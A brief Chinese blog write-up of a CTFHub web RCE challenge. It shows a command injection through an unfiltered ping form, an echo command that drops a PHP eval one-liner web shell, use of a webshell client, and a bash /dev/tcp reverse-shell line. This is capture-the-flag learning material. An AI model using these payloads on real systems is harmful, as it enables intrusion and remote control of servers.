CTFHub web技能树 RCE

时间：2020-03-04 19:00:03 阅读：495 评论：0 收藏：0 [点我收藏+]

技术图片

一个简单的ping，还没有过滤，源码也给出来了

技术图片

ls一下

127.0.0.1 & ls

技术图片

有一个可疑的php文件，，，但是直接访问和 cat 都出不来。。。

试了几下反弹shell，没成功。。。于是直接用echo了一个一句话进去

127.0.0.1 & echo "<?php eval(@\$_POST[‘a‘]);?>" > 3.php

注意这里$转义了一下，不转的话会被识别成变量。。

之后拿我40米长的菜刀

技术图片

php用了注释。。和想的差不多

这题竟然花了那么久

技术图片

我是这样反弹shell。。

bash -i >& /dev/tcp/ip/port 0>&1

原文地址：https://www.cnblogs.com/p201821440039/p/12411264.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行